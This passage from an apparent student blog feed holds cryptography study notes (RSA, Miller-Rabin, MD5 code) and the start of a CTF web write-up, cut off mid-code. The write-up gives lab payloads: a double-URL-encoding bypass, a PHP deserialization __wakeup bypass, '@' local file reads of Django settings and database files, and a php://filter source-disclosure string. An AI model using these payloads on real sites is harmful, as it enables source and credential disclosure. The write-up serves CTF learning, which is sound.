versions.</p><p>Linear cryptanalysis:</p><p>Looks for effective linear approximations relating plaintext bits, ciphertext bits and key bits of the cipher, and uses sufficiently many plaintext-ciphertext pairs to determine some key bits. Against DES it is more effective than differential cryptanalysis: 2<sup>47</sup> known plaintexts break the full 16-round DES, and reduced-round variants need far fewer.</p><p>Triple DES:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/kFI1fZwbC3vTpen.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Two-key 3DES is the encrypt-decrypt-encrypt scheme, abbreviated EDE: C = E<sub>K1</sub>(D<sub>K2</sub>(E<sub>K1</sub>(M))). Using D rather than E in the middle makes 3DES with K1 = K2 fall back to single DES.</p><p>An exhaustive key search against it is of the order of 2<sup>112</sup>, and a differential attack is of the order of 10<sup>35</sup> or more, so the scheme still has adequate security against these attacks.</p><h2 id="公钥密码RSA"><a href="#公钥密码RSA" class="headerlink" title="Public-key cryptography: RSA"></a>Public-key cryptography: RSA</h2><h3 id="RSA算法原理"><a href="#RSA算法原理" class="headerlink" title="How RSA works"></a>How RSA works</h3><ol><li>Key generation</li></ol><ul><li><p>Choose two large primes p and q (p ≠ q). They must be kept secret and should be destroyed after step 4.</p></li><li><p>Compute n = p × q and φ(n) = (p − 1) × (q − 1).</p></li><li><p>Choose an integer e with gcd(φ(n), e) = 1 and 1 < e < φ(n).</p></li><li><p>Compute d = e<sup>−1</sup> mod φ(n).</p><p>Result: the public key is {e, n}; the private key is {d} (used together with n).</p></li></ul><ol><li>Encryption (with e, n): plaintext M < n, ciphertext C = M<sup>e</sup> (mod n).</li><li>Decryption (with d, n): ciphertext C, plaintext M = C<sup>d</sup> (mod n).</li></ol><h3 id="大素数生成"><a href="#大素数生成" class="headerlink" title="Generating large primes"></a>Generating large primes</h3><p>For primality testing of large integers the Miller-Rabin test is the usual choice. It is a probabilistic algorithm that refines Fermat's little theorem (if n is prime, then a<sup>n−1</sup> ≡ 1 (mod n)). To test n, first write n − 1 = 2<sup>s</sup>·d with d odd. Each round picks a random integer a in [1, n−1]; if a<sup>d</sup> mod n ≠ 1 and a<sup>2<sup>r</sup>d</sup> mod n ≠ −1 for every r in [0, s−1], then n is composite. Otherwise n passes the round. A composite number passes a single round with probability at most 1/4, so after k rounds the probability that a composite survives is at most 4<sup>−k</sup>, and more rounds make a surviving n more certainly prime. To generate a prime of a given bit length, draw a random number of that length, test it with Miller-Rabin, use it if it passes, and otherwise draw another one. The Python script:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">from random import randint</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def miller_rabin(n, k=10):</span><br><span class="line">    """</span><br><span class="line">    Miller-Rabin primality test</span><br><span class="line">    :param n: the number to test</span><br><span class="line">    :param k: number of rounds, 10 by default</span><br><span class="line">    :return: True if n passes every round (probable prime), False if composite</span><br><span class="line">    Write n - 1 = (2^s) d with d odd.</span><br><span class="line">    Each round picks a random a in [1, n-1]; if a^d != 1 (mod n) and</span><br><span class="line">    a^(2^r d) != -1 (mod n) for every r in [0, s-1], then n is composite.</span><br><span class="line">    Otherwise n passes the round; a composite passes a round with probability</span><br><span class="line">    at most 1/4, so more rounds make a surviving n more certainly prime.</span><br><span class="line">    """</span><br><span class="line">    # 2 is prime; every other even number (and anything below 2) is not</span><br><span class="line">    if n < 2 or n % 2 == 0:</span><br><span class="line">        return n == 2</span><br><span class="line">    s, d = 0, n - 1</span><br><span class="line">    # write n - 1 as (2**s) * d</span><br><span class="line">    while d % 2 == 0:</span><br><span class="line">        s += 1</span><br><span class="line">        d //= 2</span><br><span class="line">    # k rounds of testing</span><br><span class="line">    for i in range(k):</span><br><span class="line">        # each round picks a random integer a in [1, n-1]</span><br><span class="line">        a = randint(1, n - 1)</span><br><span class="line">        x = pow(a, d, n)   # x = a**d mod n</span><br><span class="line">        # a**d mod n equal to 1 or -1 passes this round; go to the next one</span><br><span class="line">        if x == 1 or x == n - 1:</span><br><span class="line">            continue</span><br><span class="line">        else:</span><br><span class="line">            flag = 0</span><br><span class="line">            # for every r in [0, s-1], check whether a**((2**r)*d) mod n equals -1</span><br><span class="line">            for r in range(s):</span><br><span class="line">                # squaring x gives a**(d * 2**(r+1)) mod n</span><br><span class="line">                x = pow(x, 2, n)</span><br><span class="line">                if x == n - 1:</span><br><span class="line">                    flag = <span 
class="number">1</span></span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"> <span class="comment"># 若a**d≠1(mod n)且a**pow(2,r)**≠</span></span><br><span class="line"> <span class="keyword">if</span> flag == <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> <span class="keyword">return</span> <span class="literal">True</span></span><br></pre></td></tr></table></figure></div><h3 id="带模的幂运算"><a href="#带模的幂运算" class="headerlink" title="带模的幂运算"></a>带模的幂运算</h3><p>原理:模重复平方运算,Python 代码如下:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">fast_mod</span><span class="params">(x, n, p)</span>:</span></span><br><span class="line"> x = x % p</span><br><span class="line"> res = <span class="number">1</span></span><br><span class="line"> <span class="keyword">while</span> n!=<span class="number">0</span>:</span><br><span class="line"> <span class="keyword">if</span> n & <span class="number">1</span>:</span><br><span class="line"> res = (res * x) % p</span><br><span class="line"> n >>= <span class="number">1</span> <span class="comment"># 相当于 n //= 2</span></span><br><span class="line"> x = (x * x) % p</span><br><span class="line"> <span class="keyword">return</span> res</span><br></pre></td></tr></table></figure></div><h3 id="求逆运算"><a href="#求逆运算" class="headerlink" title="求逆运算"></a>求逆运算</h3><p>扩展欧几里得法</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span 
class="keyword">def</span> <span class="title">extended_gcd</span><span class="params">(a, b)</span>:</span></span><br><span class="line"> <span class="string">"""</span></span><br><span class="line"><span class="string"> 扩展的欧几里得算法计算gcd的最大公因子g以及x和y,满足g=ax+by</span></span><br><span class="line"><span class="string"> 递归式的推导过程:</span></span><br><span class="line"><span class="string"> ax₁ + by₁ = gcd(a,b)</span></span><br><span class="line"><span class="string"> bx₂ + (a%b)y₂ = gcd(b,a%b)</span></span><br><span class="line"><span class="string"> ∵ gcd(a,b) = gcd(b,a%b) 且 a%b = a - (a//b)*b</span></span><br><span class="line"><span class="string"> ∴ bx₂ + (a%b)y₂</span></span><br><span class="line"><span class="string"> = bx₂ + [a - (a//b)*b]y₂</span></span><br><span class="line"><span class="string"> = ay₂ + bx₂ - (a//b)by₂</span></span><br><span class="line"><span class="string"> = ay₂ + b[x₂ - (a//b)y₂]</span></span><br><span class="line"><span class="string"> = ax₁ + by₁</span></span><br><span class="line"><span class="string"> ∴待定系数法得:x₁ = y₂, y₁ = x₂ - (a//b)y₂</span></span><br><span class="line"><span class="string"> 递归终止条件: 当b = 0, gcd(a,b) = a, 此时 x = 1,y = 0</span></span><br><span class="line"><span class="string"> :return: (g,s,t)</span></span><br><span class="line"><span class="string"> """</span></span><br><span class="line"> <span class="keyword">if</span> b == <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">return</span> a, <span class="number">1</span>, <span class="number">0</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> g, x, y = extended_gcd(b, a % b) <span class="comment"># 先得到更里层的x₂,y₂,</span></span><br><span class="line"> <span class="keyword">return</span> g, y, x - (a // b) * y <span class="comment"># 再根据得到的x₂,y₂,计算x₁,y₁</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span 
class="keyword">def</span> <span class="title">mod_inverse</span><span class="params">(a, m)</span>:</span></span><br><span class="line"> <span class="string">"""</span></span><br><span class="line"><span class="string"> 计算模逆,即a**-1 (mod m)</span></span><br><span class="line"><span class="string"> :param a: 底数</span></span><br><span class="line"><span class="string"> :param m: 模数</span></span><br><span class="line"><span class="string"> :return: 逆元</span></span><br><span class="line"><span class="string"> """</span></span><br><span class="line"> g, x, y = extended_gcd(a, m) <span class="comment"># ax + my = 1</span></span><br><span class="line"> <span class="comment"># 若a,m不互素,则不可逆</span></span><br><span class="line"> <span class="keyword">if</span> g != <span class="number">1</span>:</span><br><span class="line"> <span class="keyword">raise</span> Exception(str(a) + <span class="string">' is not invertible!'</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> x % m</span><br></pre></td></tr></table></figure></div><h3 id="运行结果-4"><a href="#运行结果-4" class="headerlink" title="运行结果"></a>运行结果</h3><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/q13EHr9WD2caByv.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="安全性分析-4"><a href="#安全性分析-4" class="headerlink" title="安全性分析"></a>安全性分析</h3><p>RSA的安全性依赖于大数分解问题,目前,还未能从数学上证明由𝑐和𝑒计算出𝑚一定需要分解𝑛,然而,如果新方法能使密码分析者推算出𝑑,它也就成为大数分解的一个新方法</p><p>非对称加密算法中 1024 bit 密钥的强度相当于对称加密算法 80bit 密钥的强度。但是,从效率上,密钥长度增长一倍,公钥操作所需时间增加约 4 倍,私钥操作所需时间增加约 8 倍,公私钥生成时间约增长16倍。所以,我们要权衡一下效率和安全性。一般来说, 1024 bit 只能用于加密 最多117 字节的明文。</p><p><strong>低加密指数攻击:</strong></p><p>为了使加密高效,一般希望选取较小的加密指数 ee ,但是 ee 不能太小,否则容易遭到低加密指数攻击。</p><p>假设用户使用的密钥 e=3e=3 。考虑到加密关系满足:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img 
src="https://i.loli.net/2021/01/12/VyG7I1Dj6BwvsnA.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><strong>低加密指数广播攻击:</strong></p><p>还有一种情况是如果给 k 个用户发的都是同个低加密指数比如 e=3 ,在不同的模数 n1.n2,n3下 ,可由 CRT(中国剩余定理) 解出 m3 ,从而直接开三次根解出 m。</p><p><strong>共模攻击:</strong></p><p>场景:n 相同(让多个用户使用相同的模数 n ),但他们的公私钥对不同。这样,我们可以在已知 n,e1,e2,c1,c2 的情况下解出 m 。过程如下:</p><p>其实有个隐形的前提条件是:<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/4JdHZSYhe82GMLr.png" alt="" title=""> </div> <div class="image-caption"></div> </figure></p><p>存在 s1,s2 使得:<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/vhlaZ1nQ2OBoCJb.png" alt="" title=""> </div> <div class="image-caption"></div> </figure></p><p>又由 RSA 定义可知:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/7Mh9IqiXePwf1ZJ.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>可得出:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/GQT4XhnFMAlzmKE.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>这样,我们仅需要使用扩展欧几里得算法求出 s1,s2s1,s2 便可解出明文。</p><h2 id="MD5加密"><a href="#MD5加密" class="headerlink" title="MD5加密"></a>MD5加密</h2><h3 id="概述-4"><a href="#概述-4" class="headerlink" title="概述"></a>概述</h3><p>Hash,一般翻译做散列、杂凑,或音译为哈希,是把任意长度的输入(又叫做预映射)通过散列算法变换成固定长度的输出,该输出就是散列值。这种转换是一种压缩映射,也就是说,散列值的空间通常远小于输入的空间,不同的输入可能会散列成相同的输出,所以不可能从散列值来确定唯一的输入值。简单的说就是是将任意长度的输入变换为固定长度的输出的不可逆的单向密码体制。</p><p>MD5(Message-Digest Algorithm,信息摘要算法),是由美国著名密码学家Rivest设计的一种密码散列函数,可以将长度小于264比特的消息,按512比特的分组单位进行处理,输出一个128比特的消息摘要。</p><p>MD5具有Hash函数的所有特性。</p><p> ①压缩性。无论输入的明文多长,计算出来的MD5值长度固定为128位。</p><p> ②易计算性。由原数据容易计算出MD5值 。</p><p> ③抗碰撞性。知道明文和MD5值,很难找到相同MD5值相同的明文。</p><p> ④抗修改性。即便修改一个字节,计算出来的MD5值也会存在极大差异</p><p> 
MD5是在MD4基础上发展而来的,虽然比MD4稍慢,但更安全,实现了更快的雪崩效应,在实际应用中更受欢迎。</p><p> 散列函数的安全性主要体现在其良好的单向性和对碰撞的有效避免。由于散列变换是一种压缩变换,输入和输出长度相差极大啊,很难通过输出来确定 输入。但是,散列函数经常被用于数据改动检测,如果一个合法消息和一个非法消息能够碰撞,攻击就可以用合法消息生成散列值,再以非法消息作为该散列值的对应消息进行欺骗,且是他人无法识别。所以,对于Hash函数的攻击,攻击者的主要目标不是恢复原始明文,而是用相同散列值的非法消息来替代合法消息进行伪造和欺骗。</p><p> 对于MD5的碰撞研究,王小云教授做出了突破性的贡献,她的研究成果可以概括为:对于给定的M1,可以比较快速地找到M2,使得H(M1)=H(M2)。在2004年发表的论文中,她在IBM P690上用了一个小时左右就找了这样的一个碰撞,放到现在的计算机上面,这个时间会更短。所以,如果是要求高度保密的场所,比如说军工之类,MD5已经不安全了,应更换为更安全的Hash算法;但对于民用来说,一般没有人有能承受那么大计算量的设备,在一些不重要的认证上面仍可使用。</p><h3 id="MD5算法原理"><a href="#MD5算法原理" class="headerlink" title="MD5算法原理"></a>MD5算法原理</h3><h4 id="消息填充"><a href="#消息填充" class="headerlink" title="消息填充"></a>消息填充</h4><ul><li>使消息长度模512=448如果消息长度模512恰等于448,增加512个填充比特。即填充的个数为1~512,填充方法:第1比特为1,其余全部为0</li><li>将消息长度转换为64比特的数值,如果长度超过64比特所能表示的数据长度,值保留最后64比特添加到填充数据后面,使数据为512比特的整数倍</li><li>512比特按32比特分为16组</li></ul><p><strong>注:64位数据长度存储的时候是小端序</strong></p><h4 id="初始化链接变量"><a href="#初始化链接变量" class="headerlink" title="初始化链接变量"></a>初始化链接变量</h4><p>使用4个32位的寄存器A, B,C, D存放4个固定的32位整型参数,用于第一轮迭代,这里需要注意的是,寄存器的值要转化为小端序。</p><p>A=0x01234567 B=0x89abcdef C=0xfedcba98 D=0x76543210</p><h4 id="分组处理"><a href="#分组处理" class="headerlink" title="分组处理"></a>分组处理</h4><p>与分组密码分组处理相似,有4轮步骤,将512比特的消息分组平均分为16个子分组,每个子分组有32比特,参与每一轮的的16步运算,每步输入是4个32比特的链接变量和一个32位的的消息子分组,经过这样的64步之后得到4个寄存器的值分别与输入的链接变量进行模加。</p><h4 id="步函数"><a href="#步函数" class="headerlink" title="步函数"></a>步函数</h4><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/I9rGW8NK5OQRBV3.png" alt="image-20210112205456498" title=""> </div> <div class="image-caption">image-20210112205456498</div> </figure><p>该函数包括 4 轮,每轮 16 步,上一步的链接变量 D, B, C 直接赋值给下一步的链接变量 A, C, D。</p><p>A 先和非线性函数的结果加一下,结果再和 M[j] 加一下,结果再和 T[i] 加一下,结果再循环左移 s 次,结果再和原来的 B 加一下,最后的得到新 B。</p><p>非线性函数:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/xSM8oL6G13Yklgc.png" 
alt="image-20210112205446350" title=""> </div> <div class="image-caption">image-20210112205446350</div> </figure><h2 id="代码实现"><a href="#代码实现" class="headerlink" title="代码实现"></a>代码实现</h2><h3 id="消息填充-1"><a href="#消息填充-1" class="headerlink" title="消息填充"></a>消息填充</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># 对消息进行填充</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">message_padding</span><span class="params">(m)</span>:</span></span><br><span class="line"> <span class="comment"># 计算附加的64为长度(小端序表示)</span></span><br><span class="line"> len_padding = bin2little(bin(len(m))[<span class="number">2</span>:].zfill(<span class="number">64</span>))</span><br><span class="line"> m += <span class="string">'1'</span></span><br><span class="line"> <span class="keyword">while</span> len(m) % <span class="number">512</span> != <span class="number">448</span>:</span><br><span class="line"> m += <span class="string">'0'</span></span><br><span class="line"> <span class="keyword">return</span> m + len_padding</span><br></pre></td></tr></table></figure></div><h3 id="初始化链接变量-1"><a href="#初始化链接变量-1" class="headerlink" title="初始化链接变量"></a>初始化链接变量</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># 初始链接变量(小端序表示)</span></span><br><span class="line">IV_A, IV_B, IV_C, IV_D = (<span class="number">0x67452301</span>, <span class="number">0xefcdab89</span>, <span class="number">0x98badcfe</span>, <span class="number">0x10325476</span>)</span><br></pre></td></tr></table></figure></div><h3 id="分组处理及步函数"><a 
href="#分组处理及步函数" class="headerlink" title="分组处理及步函数"></a>分组处理及步函数</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># 压缩函数(对每个512bit分组进行处理)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">compress_func</span><span class="params">(a, b, c, d, m)</span>:</span></span><br><span class="line"> <span class="string">"""</span></span><br><span class="line"><span class="string"> 压缩函数函数,对每512bit得分组进行处理,包括4轮,每轮16步</span></span><br><span class="line"><span class="string"> :param a, b, c, d: 输入链接变量(即前一个分组的输出链接变量)</span></span><br><span class="line"><span class="string"> :param m: 512bit的消息分组</span></span><br><span class="line"><span class="string"> :return: A,B,C,D 输出链接变量</span></span><br><span class="line"><span class="string"> """</span></span><br><span class="line"> <span class="comment"># 对每一分组的初始链接变量进行备份</span></span><br><span class="line"> A, B, C, D = a, b, c, d</span><br><span class="line"> <span class="comment"># 将512bit分为16组,每组32bit</span></span><br><span class="line"> m_list_32 = re.findall(<span class="string">r'.{32}'</span>, m)</span><br><span class="line"> <span class="comment"># 每个分组经过4轮函数</span></span><br><span class="line"> <span class="keyword">for</span> round_index <span class="keyword">in</span> range(<span class="number">4</span>):</span><br><span class="line"> <span class="comment"># 每轮有16步</span></span><br><span class="line"> <span class="keyword">for</span> step_index <span class="keyword">in</span> range(<span class="number">16</span>):</span><br><span class="line"> <span class="comment"># 对每一步的链接变量进行备份</span></span><br><span class="line"> AA, BB, CC, DD = A, B, C, D</span><br><span class="line"> <span class="comment"># 每一轮选择不同的非线性函数</span></span><br><span class="line"> <span 
class="keyword">if</span> round_index == <span class="number">0</span>:</span><br><span class="line"> func_out = F(B, C, D)</span><br><span class="line"> <span class="keyword">elif</span> round_index == <span class="number">1</span>:</span><br><span class="line"> func_out = G(B, C, D)</span><br><span class="line"> <span class="keyword">elif</span> round_index == <span class="number">2</span>:</span><br><span class="line"> func_out = H(B, C, D)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> func_out = I(B, C, D)</span><br><span class="line"> A, C, D = D, B, C</span><br><span class="line"> <span class="comment"># B模加非线性函数的输出</span></span><br><span class="line"> B = mod_add(AA, func_out)</span><br><span class="line"> <span class="comment"># 模加消息分组(注意为大端序)</span></span><br><span class="line"> B = mod_add(B, int(bin2little(m_list_32[M_index_[round_index][step_index]]), <span class="number">2</span>))</span><br><span class="line"> <span class="comment"># print(type(B))</span></span><br><span class="line"> <span class="comment"># 模加伪随机常数</span></span><br><span class="line"> B = mod_add(B, T(<span class="number">16</span> * round_index + step_index + <span class="number">1</span>))</span><br><span class="line"> <span class="comment"># 循环左移s位</span></span><br><span class="line"> B = rol(B, shift_[round_index][step_index])</span><br><span class="line"> <span class="comment"># 模加BB</span></span><br><span class="line"> B = mod_add(B, BB)</span><br><span class="line"> <span class="comment"># print(str(16 * round_index + step_index + 1).zfill(2), end=" ")</span></span><br><span class="line"> <span class="comment"># print(hex(A).replace("0x", "").replace("L", "").zfill(8), end=" ")</span></span><br><span class="line"> <span class="comment"># print(hex(B).replace("0x", "").replace("L", "").zfill(8), end=" ")</span></span><br><span class="line"> <span class="comment"># print(hex(C).replace("0x", "").replace("L", "").zfill(8), end=" 
")</span></span><br><span class="line"> <span class="comment"># print(hex(D).replace("0x", "").replace("L", "").zfill(8))</span></span><br><span class="line"> <span class="comment"># print("*" * 38)</span></span><br><span class="line"> <span class="comment"># 与该分组的初始链接变量异或</span></span><br><span class="line"> A = mod_add(A, a)</span><br><span class="line"> B = mod_add(B, b)</span><br><span class="line"> C = mod_add(C, c)</span><br><span class="line"> D = mod_add(D, d)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> A, B, C, D</span><br></pre></td></tr></table></figure></div><h2 id="运行结果-5"><a href="#运行结果-5" class="headerlink" title="运行结果"></a>运行结果</h2><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/FlKtDS4wyQhzaIj.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>找一个在线加密的网站验证一下</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/XPN2QDrpIqyfgVz.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h2 id="安全性分析-5"><a href="#安全性分析-5" class="headerlink" title="安全性分析"></a>安全性分析</h2><p>攻击者的主要目标不是恢复原始的明文,而是用非法消息替代合法消息进行伪造和欺骗,对哈希函数的攻击也是寻找碰撞的过程。</p><p>基本攻击方法:</p><p>(1)穷举攻击:能对任何类型的Hash函数进行攻击</p><p>最典型方法是“生日攻击”:给定初值𝐻0=H(M),寻找𝑀’≠ 𝑀,使ℎ(𝑀’)= 𝐻0</p><p>(2)密码分析法:依赖于对Hash函数的结构和代数性质分析,采用针对Hash函数弱性质的方法进行攻击。这类攻击方法有中间相遇攻击、修正分组攻击和差分分析等</p><p>MD5算法中,输出的每一位都是输入的每一位的函数,逻辑函数F、G、H、I的复杂迭代使得输出对输入的依赖非常小</p><p>但Berson证明,对单轮的MD5算法,利用差分分析,可以在合理时间内找出碰撞的两条消息</p><p>MD5算法抗密码分析的能力较弱,生日攻击所需代价是试验264个消息</p><p>2004年8月17日,在美国加州圣巴巴拉召开的美密会(Crypto2004)上,中国的王小云、冯登国、来学嘉、于红波4位学者宣布,只需1小时就可找出MD5的碰撞(利用差分分析)</p>]]></content>
<summary type="html">
<p>Freely borrowed from all sorts of experts' blogs!</p>
</summary>
<category term="Study" scheme="https://github.com/gha01un/gha01un.github.io/categories/Study/"/>
<category term="AI" scheme="https://github.com/gha01un/gha01un.github.io/tags/AI/"/>
</entry>
<entry>
<title>攻防世界WEB</title>
<link href="https://github.com/gha01un/gha01un.github.io/2021/01/06/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cweb/"/>
<id>https://github.com/gha01un/gha01un.github.io/2021/01/06/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cweb/</id>
<published>2021-01-06T14:45:14.455Z</published>
<updated>2021-01-11T02:59:27.637Z</updated>
<content type="html"><![CDATA[<p>网安实验被迫写WEB!</p><a id="more"></a><h2 id="PHP2"><a href="#PHP2" class="headerlink" title="PHP2"></a>PHP2</h2><p><strong>考察.phps源码泄露、URL二次编码绕过</strong></p><p>一开始我也没明白这个题是什么意思,看了大佬的wp才知道是有.phps源码泄露:</p><p>访问index.phps得到源码:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/5QKiaRNHfZjMm6s.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>看源码就可以知道这个是很简单的URL二次编码绕过,所以payload:<code>?id=ad%256din</code></p><p>flag到手。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/XoGcKtPRN4Om7HE.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h2 id="unserialize3"><a href="#unserialize3" class="headerlink" title="unserialize3"></a>unserialize3</h2><p><strong>绕过魔法函数sleep()和wakeup()的反序列化漏洞</strong></p><p>题目名叫<strong>unserialize3</strong>,那应该是跟反序列化有关的题目。</p><p>看一下源码,出现了<code>__wakeup()</code>这个魔法函数:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/ucCKSxwXgT4FPd2.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>unserialize()执行时会检查是否存在一个wakeup()方法。如果存在则先调用wakeup()方法,预先准备对象需要的资源。wakeup()经常用在反序列化操作中。sleep()则相反,是在序列化一个对象的时候被调用。</p><p>这个漏洞的核心是:序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过<code>__wakeup()</code>的执行。</p><p>将题目中的类序列化得到结果:<code>O:4:"xctf":1:{s:4:"flag";s:3:"111";}</code></p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/joaTB6mp8FnqAUR.png" alt="" title=""> </div> <div class="image-caption"></div> 
</figure><p>简单解释一下这个字符串:</p><p><code>O</code>代表结构类型为<code>类</code>,<code>4</code>表示<code>类名长度</code>,然后是<code>类名</code>、<code>成员个数</code>。</p><p>大括号内的值是:<code>属性名类型</code>、<code>长度</code>、<code>名称</code>;<code>值类型</code>、<code>长度</code>、<code>值</code>。</p><p>如果我们把传入序列化字符串的属性个数改成比1更大的值,就不会触发<code>__wakeup()</code>方法,进而得到flag。</p><p>payload:<code>?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}</code></p><h2 id="Cat"><a href="#Cat" class="headerlink" title="Cat"></a>Cat</h2><p><strong>个人感觉比较综合也比较难的题目,考察的是url编码和django的知识</strong></p><p>打开网页发现是一个ping功能,但是输入正常的用户名没有反应,输入ip地址有反应:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/2nZBMK6YjUhrNag.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>本来因为题目名叫cat,又是ping,以为是命令执行,但是尝试了<code>|</code>、<code>&</code>等都报错,提示<code>Invalid URL</code>。看来题目的本意并不是命令执行。</p><p>看了网上一个大佬的wp才知道这个是跟Django有关的。网站本身是用PHP写的,但是可能有Django的组成部分。</p><p>在url里传参<code>%80</code>报错(URL编码是0~127,80的十六进制是128自然报错),从报错信息的目录结构可以知道这个是Django的项目:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/B8yf5MlTWg3JYun.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/P7XCfZDKoMn21sy.png" alt="image-20210106224024807" title=""> </div> <div class="image-caption">image-20210106224024807</div> </figure><p>其他的没什么信息,又去看了看大佬的wp,发现这个原来还需要用PHP的@前缀:</p><p>根据Django的目录特性,用@进行文件传递,对文件进行读取之后将内容传给url参数,如果有错误信息就可以得到回显,进而取得更多错误信息、帮助我们拿到flag。</p><p>先看看settings.py:</p><p>payload: <code>?url=@/opt/api/api/settings.py</code></p><p>找到数据库文件的存放位置:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/zNeBO1gRmUxaijo.png" alt="" title=""> </div> <div class="image-caption"></div> 
</figure><p>看看这个文件:</p><p>payload: <code>?url=@/opt/api/database.sqlite3</code></p><p>搜索CTF得到flag。</p><h2 id="ics-05"><a href="#ics-05" class="headerlink" title="ics-05"></a>ics-05</h2><p>进去之后随便点点发现了这个:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/Ay3ec2gBkN6HDiL.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>page=index,那应该可以用伪协议读出源码。</p><p>payload:<code>page=php://filter/read=convert.base64-encode/resource=index.php</code></p><p>源码到手,base64解码一下:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="HTML"><figure class="iseeu highlight /html"><table><tr><td class="code"><pre><span class="line"><span class="php"><span class="meta"><?php</span></span></span><br><span class="line"><span class="php">error_reporting(<span class="number">0</span>);</span></span><br><span class="line"></span><br><span class="line"><span class="php">@session_start();</span></span><br><span class="line"><span class="php">posix_setuid(<span class="number">1000</span>);</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="meta">?></span></span></span><br><span class="line"><span class="meta"><!DOCTYPE <span class="meta-keyword">HTML</span>></span></span><br><span class="line"><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"></span><br><span class="line"><span class="tag"><<span class="name">head</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">"utf-8"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">meta</span> <span class="attr">name</span>=<span class="string">"renderer"</span> <span class="attr">content</span>=<span 
